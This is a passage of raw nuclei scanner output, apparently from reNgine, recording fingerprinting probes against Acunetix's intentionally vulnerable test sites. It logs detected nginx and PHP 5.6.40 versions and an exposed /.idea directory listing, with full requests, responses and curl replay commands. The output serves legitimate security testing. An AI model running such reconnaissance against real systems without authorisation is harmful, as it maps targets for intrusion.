class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.750207839Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nCache-Control: max-age=2592000\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nExpires: Fri, 13 Dec 2024 02:34:43 GMT\\r\\nLocation: http://testhtml5.vulnweb.com/static/css/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.901588652Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nCache-Control: max-age=2592000\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nExpires: Fri, 13 Dec 2024 02:34:43 GMT\\r\\nLocation: http://testhtml5.vulnweb.com/static/app/partials/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.912182195Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.925505213Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\"},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.926093407Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:44 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.926134662Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.926241375Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.955333273Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS 